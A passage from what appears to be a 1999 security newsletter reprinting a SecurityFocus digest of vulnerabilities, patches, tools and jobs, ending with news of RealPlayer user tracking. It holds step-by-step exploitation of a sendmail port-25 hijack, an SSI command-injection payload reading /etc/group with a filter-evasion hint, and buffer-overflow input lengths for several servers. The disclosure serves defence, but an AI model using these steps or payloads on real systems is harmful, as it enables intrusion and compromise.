program inherit (or "hijack") the file descriptor for the socket listening
on (priviliged) port 25.
The problem begins with the way sendmail handles the failure of an
accept() call. The accept() call is made when a tcp syn packet is
recieved by a listening tcp socket. When the three-way handshake does not
complete (as is the consequence of a half-open tcp "stealth scan"),
accept() fails and sendmail closes all listening sockets and sleeps for 5
seconds.
The second problem is that a user can start the sendmail daemon if a more
obscure argument is passed (-bD). The -bD flag tells sendmail to run as a
daemon, but in foreground. User priviliges are not checked against for
this option, allowing any user to start sendmail.
The third problem is how sendmail reacts to a HUP signal. When a HUP is
recieved, sendmail calls execve(argv[0],..) to restart itself. The
problem here is obvious, since argv[0] can be changed to anything. The
bigger problem here though, is that the fourth file descriptor is not
closed before this is done (which happens to be the one for the listening
tcp socket), thus any argv[0] which is executed via the execve() call will
inherit the descriptor.
The steps required to exploit this are as follows:
- From another machine, use nmap to do a "half open scan" on port 25 of the target host.
(this will make sendmail go to sleep for five seconds, unattached to port 25)
- In the 5 seconds that sendmail spends sleeping, call sendmail -bD as a
user locally on the target box with noexec and set argv[0] to the program
of your choice. (noexec is a program which allows you to set argv[0] to
whatever you'd like).
- Send the process a HUP, which is ok since you own the process. (The
program you specified in the noexec command which is to be argv[0] now has
the file descriptor for the socket listening on port 25).
The consequences of this are full compromise of the mail server. An
attacker could write a trojan "mail server" that would respond on port 25
to legitimate smtp connections.
20. Guestbook CGI Remote Command Execution Vulnerability
BugTraq ID: 776
Remote: Yes
Date Published: 1999-11-05
Relevant URL:
http://www.securityfocus.com/bid/776
Summary:
When guest book is configured to allow for HTML posts and you have enabled
server-side includes for HTML, it may be possible for an attacker to embed
SSI (server-side include) code in guestbook messages. The server-side
includes allow for remote command execution, including displaying of any
files for which the web server has read access to (see the example):
<!--#exec cmd="cat /etc/group"
In an attempt to stop this from happening, guestbook.pl parses for SSI
commands under the assumption that they are in this format:
<-- SSI command -->
^^ Does not need to be there.
Apache will accept different formats, which can evade the regular
expression in guestbook.pl, executing commands on the target host as they
would [if they were put there by the author].
21. Artisoft XtraMail Multiple DoS Vulnerabilities
BugTraq ID: 791
Remote: Yes
Date Published: 1999-11-09
Relevant URL:
http://www.securityfocus.com/bid/791
Summary:
There are several unchecked buffers in XtraMail 1.11, which when
overflowed will crash the server and cause a denial of service.
1: POP3 server PASS argument
Will be overflowed with a password of over 1500 characters.
2: SMTP server HELO argument
Will be overflowed with a 10,000 character argument to the HELO command.
3: Control service Username
XtraMail includes a remote administration utility which listens on port
32000 for logins. The username buffer will be overflowed with a string of
10,000 characters or more.
22. BigIP Config UI Vulnerabilities
BugTraq ID: 778
Remote: No
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/778
Summary:
BigIP is a load balancing system from F5 software. It has a web-based
configuration system, which is vulnerable to several standard CGI attacks.
According to Guy Cohen <guy@crypto.org.il>, it is possible to view
arbitrary files on the BSDI system which it is installed on. To add to
this, the configuration program is installed setuid root. This is
considered a local vulnerability since htaccess authentication is required
to get to the configuration area. No more information on this
vulnerability is available.
23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability
BugTraq ID: 779
Remote: Yes
Date Published: 1999-11-09
Relevant URL:
http://www.securityfocus.com/bid/779
Summary:
Extremely long 'file://' URLs will overflow a buffer in IE 4 and 5 for
Windows 98. The data in the URL gets passed to the EIP, so arbitrary code
can be executed if it is included in the long URL.
24. Seyon Relative Path Vulnerability
BugTraq ID: 780
Remote: No
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/780
Summary:
Seyon uses relative pathnames to spawn two other programs which it
requires. It is possible to exploit this vulnerability to obtain the
priviliges which seyon runs with. It is installed (by default) setgid
dialer on FreeBSD and root on Irix.
25. IrfanView32 Image File Buffer Overflow Vulnerability
BugTraq ID: 781
Remote: Yes
Date Published: 1999-11-09
Relevant URL:
http://www.securityfocus.com/bid/781
Summary:
IrfanView32, a freeware image viewer, has a problem in the handling of
Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that
contains the Adobe Photoshop marker in the header (8BPS) followed by a
long string, the program will crash. It is possible to insert code in the
string for execution.
26. Linux nfsd Remote Buffer Overflow Vulnerability
BugTraq ID: 782
Remote: Yes
Date Published: 1999-11-09
Relevant URL:
http://www.securityfocus.com/bid/782
Summary:
A remotely exploitable buffer overflow vulnerability was found in versions
of Linux nfsd known to ship with Debian Linux 2.1 and RedHat Linux 5.2.
When they were fixed in the respective distributions/versions, no
vulnerability information was published by the vendors. The vulnerability
was in removal of long directory paths on a mounted nfs share. The length
of the string holding the directory name which was to be removed was not
checked and the buffer holding it could be overflowed, allowing execution
of arbitrary code on the nfs server as root. A consequence of this being
exploited is remote root compromise.
27. TransSoft Broker User Name Buffer Overflow Vulnerability
BugTraq ID: 783
Remote: Yes
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/783
Summary:
If a user name of more than 2730 characters is passed to the Broker FTP
server software, the program will crash. If the program is running as a
service, the service will consume all available memory and crash the
entire system.
28. Windows 95/98 UNC Buffer Overflow Vulnerability
BugTraq ID: 792
Remote: Yes
Date Published: 1999-11-02 to 1999-11-14
Relevant URL:
http://www.securityfocus.com/bid/792
Summary:
There is a overflowable buffer in the networking code for Windows 95 and
98 (all versions). The buffer is in the part of the code that handles
filenames. By specifying an exceptionally long filename, an attacker can
cause the machine to crash or execute arbitrary code. This vulnerability
could be exploited remotely by including a hostile File: URL or UNC in a
web page or HTML email. The attack would occur when the pagfe was loaded
in a browser or the email was opened (including opening the email in a
preview pane.)
29. RedHat Linux csh/tcsh Vulnerability
BugTraq ID: 785
Remote: No
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/785
Summary:
It may be possible to execute arbitrary commands as a user upon their
login if they are using csh/tcsh. The problem has to do with the init
scripts for these shells that run when the user logs in and a /tmp race
condition which they are vulnerable to.
30. Immunix StackGuard Evasion Vulnerability
BugTraq ID: 786
Remote: Yes
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/786
Summary:
The following was taken directly from the Immunix advisory:
A significant security vulnerability has been discovered by Mariusz
Woloszyn <emsi@it.pl> that permits attackers to perpetrate successful
attacks against StackGuarded programs under particular circumstances.
Woloszyn is preparing a Phrack article describing this vulnerability,
which we summarize here. StackGuard 1.21 effectively protects against
this vulnerability. The Immunix team would like to thank Mariusz for
kindly notifying us first about this vulnerability, and allowing us the
time to develop and distribute a defense.
Consider this vulnerable code:
foo(char * arg) {
char * p = arg; // a vulnerable pointer
char a[25]; // the buffer that makes the pointer vulnerable
gets(a); // using gets() makes you vulnerable
gets(p); // this is the good part
}
In attacking this code, the attacker first overflows the buffer a[] with
a goal of changing the value of the char * p pointer. Specifically,
the attacker can cause the p pointer to point anywhere in memory,
but especially at a return address record in an activation record.
When the program then takes input and stores it where p points, the
input data is stored where the attacker said to store it.
The above attack is effective against the Random and Terminator Canary
mechanisms because those methods assume that the attack is linear,
i.e. that an attacker seeking to corrupt the return address must
necessarily use a string operation that overflows an automatic buffer on
the stack, moving up memory through the canary word, and only then reach
the return address entry. The above attack form, however, allows the
attacker to synthesize a pointer to arbitrary space, including pointing
directly at the return address, bypassing canary protection.
31. InterScan VirusWall Long HELO Buffer Overflow Vulnerability
BugTraq ID: 787
Remote: Yes
Date Published: 1999-11-07
Relevant URL:
http://www.securityfocus.com/bid/787
Summary:
There is a buffer overflow in the HELO command of the smtp gateway which
ships as part of the VirusWall product. This buffer overflow could be used
to launch arbitrary code on the vulnerable server.
32. Multiple BIND Vulnerabilities
BugTraq ID: 788
Remote: Yes
Date Published: 1999-11-10
Relevant URL:
http://www.securityfocus.com/bid/788
Summary:
There are several vulnerabilities in recent BIND packages (pre 8.2.2).
The first is a buffer overflow condition which is a result of BIND
improperly validating NXT records. The consequence of this being exploited
is a remote root compromise (assuming that BIND is running as root, which
is default).
The second is a denial of service which can occur if BIND does not
validate SIG records properly.
The next is a bug which allows attackers to cause BIND to consume more
file descriptors than can be managed, causing named to crash.
The fourth vulnerability is anot her denial of service which can be caused
locally if certain permission conditions are met when validating zone
information loaded from disk files.
The last is a vulnerability has to do with closing TCP sockets. If
protocols for doing so are not adhered to, BIND can be paused for 120
seconds at a time.
33. IMail POP3 Buffer Overflow Denial of Service Vulnerability
BugTraq ID: 789
Remote: Yes
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/789
Summary:
There is a buffer overflow in the username field when the username is
between 200 and 500 characters. Although it may be possible to execute
arbitrary code on the vulnerable server, current exploits only cause a
denial of service on the remote machine.
34. NetCPlus SmartServer3 POP Buffer Overflow Vulnerability
BugTraq ID: 790
Remote: Yes
Date Published: 1999-11-11
Relevant URL:
http://www.securityfocus.com/bid/790
Summary:
The POP server that is part of the NetcPlus SmartServer3 email server has
an unchecked buffer that could allow an attacker to execute code on the
server. If the USER command is followed by an argument of over 800
characters, the input buffer will be overflowed, and data from the
argument will be passed to the system to be executed at the privelege
level of the SmartServ program.
35. Microsoft ActiveX Error Message Vulnerability
BugTraq ID: 793
Remote: Yes
Date Published: 1999-11-02 to 1999-11-14
Relevant URL:
http://www.securityfocus.com/bid/793
Summary:
The Windows Media Player ActiveX control, shipped with IE 5, returns a
specific error code if it is instructed to load a local file that does not
exist. In this way, an attacker could determine whether or not a specified
file on the victim's host exists. This could be used to determine user
names and other facets of system configuration.
36. MacOS9 NDS Client Inherited Login Vulnerability
BugTraq ID: 794
Remote: No
Date Published: 1999-11-02 to 1999-11-14
Relevant URL:
http://www.securityfocus.com/bid/794
Summary:
The NDS client for MacOS 9 fails to log the user out of the NDS tree when
s/he logs out of the MacOS 9 system. The next user to log in to the
machine will inherit the previous user's NDS access.
III. PATCH UPDATES 1999-11-02 to 1999-11-02 to 1999-11-14
-------------------------------------------
1. Vendor: Texas Imperial Software
Product: WFTPD and WFTPD Pro
Patch Location:
http://www.wftpd.com/
Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability
BugTraq ID: 747
Relevant URLS:
http://www.wftpd.com/bugpage.htm
http://www.securityfocus.com/bid/747
Note: This is a new version of WFTPD (2.41). As of Nov 14, 1999,
it is only available to registered WFTPD users. The fixed shareware
version will be available soon.
2. Vendor: DataTel
Product: Interscan VirusWall
Patch Location:
http://www.beavuh.org/exploits/V323PTCH.COM
Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability
BugTraq ID: 787
Relevant URLS:
http://www.securityfocus.com/bid/787
Note: The patch was not provided by DataTel. It was a temporary fix supplied by "Beavuh".
3. Vendor: Microsoft
Product: Windows 95/98
Patch Location:
Windows 95:
http://download.microsoft.com/download/win95/update/245729/w95/en-us/245729us5.exe
Windows 98:
http://download.microsoft.com/download/win98/update/245729/w98/en-us/245729us8.exe
Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability
BugTraq ID: 792
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/792
4. Vendor: ISC
Product: BIND
Patch Location:
(OS specific patches available to us as of Nov 14)
Caldera
ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current
MD5s
db1dda05dbe0f67c2bd2e5049096b42c RPMS/bind-8.2.2p3-1.i386.rpm
82bbe025ac091831904c71c885071db1
RPMS/bind-doc-8.2.2p3-1.i386.rpm
2f9a30444046af551eafd8e6238a50c6
RPMS/bind-utils-8.2.2p3-1.i386.rpm
0e4f041549bdd798cb505c82a8911198 SRPMS/bind-8.2.2p3-1.src.rpm
Red Hat Linux 4.x:
Intel:
ftp://updates.redhat.com/4.2/i386/bind-8.2.2_P3-0.4.2.i386.rpm
ftp://updates.redhat.com/4.2/i386/bind-devel-8.2.2_P3-0.4.2.i386.rpm
ftp://updates.redhat.com/4.2/i386/bind-utils-8.2.2_P3-0.4.2.i386.rpm
Alpha:
ftp://updates.redhat.com/4.2/alpha/bind-8.2.2_P3-0.4.2.alpha.rpm
ftp://updates.redhat.com/4.2/alpha/bind-devel-8.2.2_P3-0.4.2.alpha.rpm
ftp://updates.redhat.com/4.2/alpha/bind-utils-8.2.2_P3-0.4.2.alpha.rpm
Sparc:
ftp://updates.redhat.com/4.2/sparc/bind-8.2.2_P3-0.4.2.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/bind-devel-8.2.2_P3-0.4.2.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/bind-utils-8.2.2_P3-0.4.2.sparc.rpm
Source packages:
ftp://updates.redhat.com/4.2/SRPMS/bind-8.2.2_P3-0.4.2.src.rpm
Red Hat Linux 5.x:
Intel:
ftp://updates.redhat.com/5.2/i386/bind-8.2.2_P3-0.5.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.2_P3-0.5.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.2_P3-0.5.2.i386.rpm
Alpha:
ftp://updates.redhat.com/5.2/alpha/bind-8.2.2_P3-0.5.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.2_P3-0.5.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.2_P3-0.5.2.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/bind-8.2.2_P3-0.5.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.2_P3-0.5.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.2_P3-0.5.2.sparc.rpm
Source packages:
ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.2_P3-0.5.2.src.rpm
Red Hat Linux 6.x:
Intel:
ftp://updates.redhat.com/6.1/i386/bind-8.2.2_P3-1.i386.rpm
ftp://updates.redhat.com/6.1/i386/bind-devel-8.2.2_P3-1.i386.rpm
ftp://updates.redhat.com/6.1/i386/bind-utils-8.2.2_P3-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/bind-8.2.2_P3-1.alpha.rpm
ftp://updates.redhat.com/6.0/alpha/bind-devel-8.2.2_P3-1.alpha.rpm
ftp://updates.redhat.com/6.0/alpha/bind-utils-8.2.2_P3-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.0/sparc/bind-8.2.2_P3-1.sparc.rpm
ftp://updates.redhat.com/6.0/sparc/bind-devel-8.2.2_P3-1.sparc.rpm
ftp://updates.redhat.com/6.0/sparc/bind-utils-8.2.2_P3-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/bind-8.2.2_P3-1.src.rpm
Vulnerability Patched: Multiple BIND Vulnerabilities
BugTraq ID: 788
Relevant URLS:
http://www.isc.org/products/BIND/bind-security-19991108.html
http://www.securityfocus.com/bid/788
5. Vendor: Irfan Skiljan
Product: IrfanView32
Patch Location:
http://stud1.tuwien.ac.at/~e9227474/iview310.zip
(version 3.1 or IrfanView32)
Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability
BugTraq ID: 781
Relevant URLS:
http://stud1.tuwien.ac.at/~e9227474/
http://www.securityfocus.com/bid/781
6. Vendor: Debian
Product: GNU/Linux
Patch Location:
Source Packages:
http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.diff.gz
http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.dsc
http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37.orig.tar.gz
Alpha:
http://security.debian.org/dists/slink/updates/binary-alpha/nfs-server_2.2beta37-1slink.1_alpha.deb
i386:
http://security.debian.org/dists/slink/updates/binary-i386/nfs-server_2.2beta37-1slink.1_i386.deb
m68k:
http://security.debian.org/dists/slink/updates/binary-m68k/nfs-server_2.2beta37-1slink.1_m68k.deb
Sparc:
http://security.debian.org/dists/slink/updates/binary-sparc/nfs-server_2.2beta37-1slink.1_sparc.deb
Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability
BugTraq ID: 782
Relevant URLS:
http://www.securityfocus.com/bid/782
7. Vendor: Cobalt Networks
Product: RaQ2
Patch Location:
RaQ 3i (x86)
RPM:
ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-pacifica-3.6.4.C5.i386.rpm
SRPM:
ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-pacifica-3.6.4.C5.src.rpm
RaQ 2 (MIPS)
RPM:
ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-raq2-3.6.4.C5.mips.rpm
SRPM:
ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-raq2-3.6.4.C5.src.rpm
Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability
BugTraq ID: 777
Relevant URLS:
http://www.securityfocus.com/bid/777
8. Vendor: Microsoft
Product: Outlook
Patch Locations:
http://windowsupdate.microsoft.com
http://www.microsoft.com/msdownload
http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm
Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability
BugTraq ID: 775
Relevant URLS:
http://www.microsoft.com/security
http://www.securityfocus.com/bid/775
9. Vendor: Imm
unix
Product: StackGaurd
Patch Locations:
http://immunix.org/downloads.html (New version)
Vulnerability Patched: Immunix StackGuard Evasion Vulnerability
BugTraq ID: 786
Relevant URLS:
http://www.immunix.org
http://www.securityfocus.com/bid/786
10. Vendor: Ipswitch
Product: IMail
Patch Locations:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe
Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability
BugTraq ID: 789
Relevant URLS:
http://www.ipswitch.com
http://www.securityfocus.com/bid/789
11. Vendor: Microsoft
Product: Windows NT
Patch Locations:
X86:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q243649.exe
Alpha:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN-US/Q243649.exe
Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities
and NT Spoolss.exe DLL Insertion Vulnerability
BugTraq ID: 768/769
Relevant URLS:
http://www.microsoft.com/security
http://www.securityficus.com/bid/768
http://www.securityfocus.com/bid/769
12. Vendor: Floosietek
Product: FTGate
Patch Location:
http://www.floosietek.com/dl_ftg/download.htm
(Download version 2.2)
Vulnerability Patched: FTGate Directory Traversal Vulnerability
BugTraq ID: 772
Relevant URLS:
http://www.floosietek.com
http://www.securityfocus.com/bid/772
13. Vendor: AN
Product: AN HTTPD
Patch Location:
http://www.st.rim.or.jp/~nakata/
(version 1.21)
Vulnerability Patched: AN-HTTPd CGI Vulnerabilities
BugTraq ID: 762
Relevant URLS:
http://www.securityfocus.com/bid/762
14. Vendor: IBM
Product: HomePagePrint
Patch Location:
http://www.ibm.co.jp/software/internet/hpgprt/down2.html
Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability
BugTraq ID: 763
Relevant URLS:
http://www.securityfocus.com/bid/763
INCIDENTS SUMMARY 1999-11-02 to 1999-11-14
------------------------------------------
1. possible trojan/virus issue solved (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=382041CA.242F6E7D@netvision.net.il
2. port 109 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=01BF2624.A77B0A40.cholet@logilune.com
3. Re: Logging hosts (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=Pine.LNX.4.10.9911072300170.29394-100000@mad.unix.kg
4. Mail-relaying probing (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-8&msg=14375.58989.252415.240801@cap-ferrat.albourne.com
V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-02 to 1999-11-14
----------------------------------------------------------
1. Re: FreeBSD listen() (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-1&msg=Pine.LNX.4.10.9911040724550.415-100000@mad.unix.kg
2. ssh-1.2.27 remote buffer overflow - exploitable (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=19991109014853.3239.qmail@securityfocus.com
3. Re: thttpd 2.04 stack overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=199911100200.SAA05038@shell3.ba.best.com
4. MS Outlook javascript parsing bug (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38285E28.CBB524CE@enternet.se
5. Re: Open Port on Win98 box (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38299BCD.BE9B3E3A@thievco.com
6. minor (?) mc bug (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=Pine.LNX.4.10.9911102253410.3886-100000@pa16.suwalki.ppp.tpnet.pl
7. [Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=382DA20D.9338A51D@thievco.com
VI. SECURITY JOBS SUMMARY 1999-11-02 to 1999-11-14
---------------------------------------------------
Seeking Staff:
1. Information Security Consultant(s) - #111 - NY
Reply to: Lori Sabat <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103184820.57.qmail@securityfocus.com
2. Information Security Analyst - #253 - NJ
Reply to: Lori Sabat <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103185247.280.qmail@securityfocus.com
3. Sr Firewall Engineer Position
Reply to: Lora Reidmiller <woodland@arlington.net>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=3821B087.8ECC1A00@arlington.net
4. Sr. Mgr. Systems Security
Reply to: Blomme, Sarah <sblomme@mcleodusa.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=8625681F.0077E21A.00@smtp2.mcld.net
5. Security Sales Nationwide
Reply to: Erik Voss <evoss@mrsaratoga.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=017501bf270b$6774e1e0$6775010a@saratoga3
6. Sr. Mgr. Systems Security
Reply to: Blomme, Sarah <sblomme@mcleodusa.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=86256820.004BEF5A.00@smtp2.mcld.net
7. Software Engineer #4 - Atlanta, GA
Reply to: Lori Sabat <lori@altaassociates.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=19991108194602.11673.qmail@securityfocus.com
8. Website password-protection scripts programmer needed
Reply to: Katim S. Touray <s_touray@fanafana.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=382A239F.5C32B0A8@fanafana.com
VII. SECURITY SURVEY 1999-11-02 to 1999-11-14
----------------------------------------------
The question for 1999-11-02 to 1999-11-14 was:
Would you support a vendor that sued people who publicized bugs in their software? (Yes, this is happening!)
Results:
Yes 5% / 10 votes
No 94% / 174 votes
Total number of votes: 184 votes
VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-02 to 1999-11-14
--------------------------------------------------------
1. Security Focus Pager
by Security Focus
Relevant URL:
http://www.securityfocus.com/pager
This program allows the user to monitor additions to the Security Focus
website without constantly
maintaining an open browser. Sitting quietly in the background, it polls
the website at a user-specified interval and alerts the user via a
blinking icon in the system tray, a popup message or both (also
user-configurable).
2. Snoot 1.3.1
by Martin Roesch (roesch@clark.net)
< http://www.clark.net/~roesch/security.html >
Platforms: FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OpenBSD and Solaris
Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight network
intrusion detection system. It features rules based logging and can perform content
searching/matching in addition to being used to detect a variety of other attacks and probes,
such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and much more. Snort
has a real-time alerting capabilty, with alerts being sent to syslog, a seperate "alert" file, or
even to a Windows computer via Samba.
3. BUGS 2.0.1
by Sylvain Martinez
< http://www.asi.fr/~martinez/crypto/bugs-2.0.1.tgz >
Platforms: HP-UX, Linux, Solaris, SunOS, UNIX, Windows 2000, Windows 3.x,
Windows 95/98 and Windows NT
Strong private key cryptography algorithm and applications. Multiplateform (UNIX and
Windows). Crypt/hide/key generator. Unlimited key length, source code available.
4. NSS Narr0w Security Scanner
by Narrow NaRr0w@LeGiOn2000.cC
< http://www.wiretrip.net/rfp/1/index.asp >
Platforms: Perl (any system supporting perl)
Narr0w Security Scanner checks for 153 remote vulnerabilities. Written in perl.
5. cgi-check99 v0.3 0.3
by deepquest
< http://www.deepquest.pf >
Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD,
OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, VMS, Windows 2000,
Windows 3.x, Windows 95/98, Windows CE and Windows NT
This is one of the worlds most cross platform cgi scanners, running on 37 operating systems!
Even Palmos soon! Will check for hundreds of common cgi and other remote issues. Plus it will
report you the Bugtraq ID of some vulnerabilities. Get the rebol interpreter at
http://www.rebol.com.
6. guard
by ondrej suchy
< http://www.penguin.cz/~ondrej/guard/ >
Platforms: Linux
Guard is more an early warning system than IDS. it scans system logs for signs of intrusion in
real time. produces colored output on the tty, sends alerts and regular reports. database of
suspicious strings included.
IX. SPONSOR INFORMATION -
------------------------------------------
URL: http://www.ntobjectives.com
NT OBJECTives, Inc. is a small company dedicated to building network security tools for
the Windows NT platform. Our current line of tools is directed at security forensics.
We base our designs around fast, visually intuitive interfaces with a sharp focus on
making security analysis easy. This is the foundation of our tool line. Our goal is for
each of our successive product builds to enhance previous capabilities so that you have
a comprehensive set of tools at your disposal. We keep abreast of current trends, tools,
and issues, so that we can bring you quality network tools
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have to anwser.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address
with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I will manualy remove
you.
3. How do I disable mail delivery temporarily?
If you will are simply going in vacation you can turn off mail delivery without unsubscribing by
sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to
LISTSERV@SECURITYFOCUS.COM with with a message body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than that from which you are sending
commands to LISTSERV from. Either send email from the appropiate address or email the
moderator to be unsubscribed manually.
@HWA
18.0 First RealJukebox Now RealPlayer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Last week it was discovered that RealNetworks software
product RealJukebox transmitted a Global Unique
Identifier that was used to track a users listening
habits. Now it seems that RealPlayer, the companies
streaming video player, also transmits a GUID.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_508000/508340.stm
Wired
http://www.wired.com/news/technology/0,1282,32350,00.html
BBC;
Sci/Tech
New Real privacy flaw
Over 12 million people use the software to listen to their CDs
A new security flaw has been discovered in one of the
most popular programs used to access music and video
over the internet.
Software experts say a privacy glitch in RealNetworks'
RealPlayer program means it could secretly collect
information about its millions of users.
Earlier this week, RealNetworks apologised after it was
revealed that its RealJukebox software suffered from a
similar problem.
It subsequently released issued a patch to remove a
unique identification number from the software which
tracks users' listening habits.
'Harder to fix'
The US security expert who discovered the original flaw,
Richard Smith, says the glitch is in RealPlayer could
present a serious problem for the software company.
"It's harder to fix because the player has been around for
years," Mr Smith, former president of Phar Lap Software,
was quoted as saying.
RealNetworks controls around 85% of the streaming
media market, with 69 million registered users of
RealPlayer.
RealNetworks has yet to comment on the reports.But
industry insiders say it is planning to release a new
version of the software without the unique identification
number.
Identifying users
The identifier is known as a globally unique identifier, or
GUID. It transmits information to the company's
headquarters details about what music each customer
listens to and how many songs are copied.
In the case of RealNetworks, the information sent
includes a serial number that could be used to identify
an individual.
One of RealPlayer's main rivals, Microsoft's Windows
Media Player, also transmits an identifier.
But the ID number cannot be linked to personal
information as Microsoft does not require user
registration.
The nonprofit group that monitors and enforces the
corporate privacy policies of its members, TRUSTe, is
planning to investigate whether RealNetworks had
broken its privacy promises and whether its previous
statement, which TRUSTe had vetted, was adequate.
Wired;
Real Damage Control -- Again
by Chris Oakes and Jennifer Sullivan
3:00 a.m. 6.Nov.1999 PST RealNetworks has issued another software update
that addresses a privacy concern, this time in its popular RealPlayer
software.
The company posted a free beta of RealPlayer 7 on Monday, which it said no
longer tracks personal user information.
Last Monday, RealNetworks had plugged a related privacy glitch in its
RealJukebox music software. The patch removed from its RealJukebox
software a unique identification number, which tracks users' listening
habits. Software analysis has shown that the same identifier is also
transmitted by version 6 of the RealPlayer.
The unique identification numbers could be tied to personal information
that is collected by RealNetworks during user registration. RealNetworks
claims that more than 85 million people use the RealPlayer.
"It's harder for [RealNetworks] to fix [the RealPlayer problem], because
the player has been around for years," said Richard Smith, who first
pointed out the problem. "[Sites] are really using the [ID] numbers in a
